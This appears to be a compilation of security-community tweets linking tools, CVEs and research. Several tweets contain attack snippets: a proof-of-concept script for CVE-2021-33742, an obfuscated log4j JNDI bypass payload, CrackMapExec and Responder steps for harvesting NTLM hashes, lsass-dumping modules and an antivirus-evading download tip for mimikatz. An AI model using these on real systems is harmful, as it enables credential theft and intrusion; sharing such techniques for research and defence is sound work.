Made a SharpHound Collection Cheat Sheet and a little post to go with it... #BloodHoundAD insinuator.net/2021/05/dogwhi…

Erst ein krasses Tabu – und irgendwann empört sich keiner mehr. Dafür gibt's einen einfachen Trick. Aus aktuellem Anlass.

CVE-2021-33742 tweetable PoC: <script> var b = document.createElement("html"); b.innerHTML = Array(40370176).toString(); b.innerHTML = ""; </script>

MSRC has release CVE-2021-34481 today. msrc.microsoft.com/update-guide/v…

yarh- for some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file like this: I dont know the full extent of the issue yet, but its too many to not be a problem I think.

I've published my first 'Gist' combining several well known techniques to accomplish Windows workstation takeover in a default Active Directory Configuration. SMB writeable shares are spicier than ever. 🌶️ gist.github.com/gladiatx0r/1ff…

ICYMI: Top hacks from Black Hat and DEF CON 2021 portswigger.net/daily-swig/top…

For a compromise assessment of #Exchange servers I recommend using our free THOR Lite scanner We've added all rules & IOCs relevant to #ProxyShell exploitation & update them frequently THOR Lite nextron-systems.com/thor-lite/ YARA rules github.com/Neo23x0/signat… github.com/Neo23x0/signat…

In case you want to see something cool about CrackMapExec and Responder 😌😋 1⃣ cme smb <ip> -u user -p pass --shares 2⃣ Responder -I eth0 3⃣ cme smb <ip> -u user -p pass -M slinky -o ... Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥 🪂

Need to go under the radar downloading #mimikatz (and other suspect payloads)? Then newly discovered #lolbin "C:\Windows\System32\Cmdl32.exe" (signed by MS) is for you. It's like a new certutil.exe but absolutely unheard of by any antivirus software!

Threema does not have forward secrecy (soatok.blog/2021/11/05/thr…) and local keys are stored insecurely. DROPPED from tiny.cc/thcstfu. Stay safe. #privacy #COP26

Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀 I've integrated them to CrackMapExec as module: 1⃣ -M handlekatz 2⃣ -M nanodump 3⃣ -M procdump (as bonus 😝) (dmp parsed by pypykatz from SkelSec ) Available on Porchetta Industries 🪂

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} log4j bypass lol Lessons learned: Don't use Java.

My latest North Korea research with Martyn Williams is now publicly available: lumen.global/reveal-report Also added it to the DB: dprktech.adversec.com/post/project-r…

Watch the replay of VeloCON 2023 on our YouTube channel. You can relive the entire conference or watch any individual presentations you may have missed. youtube.com/watch?v=WWB5xe…

Check out GoLinHound: - Discovers Linux & SSH attack paths - Outputs OpenGraph JSON for BloodHound ingestion - Integrates with SharpHound and AzureHound data to unveil cross-technology attack paths github.com/RantaSec/golin…

CVE-2026-41651 — PackageKit TOCTOU ("Pack2TheRoot") codeberg.org/hillu/cve-2026…

Great trainer and great content, took the training and liked it A LOT!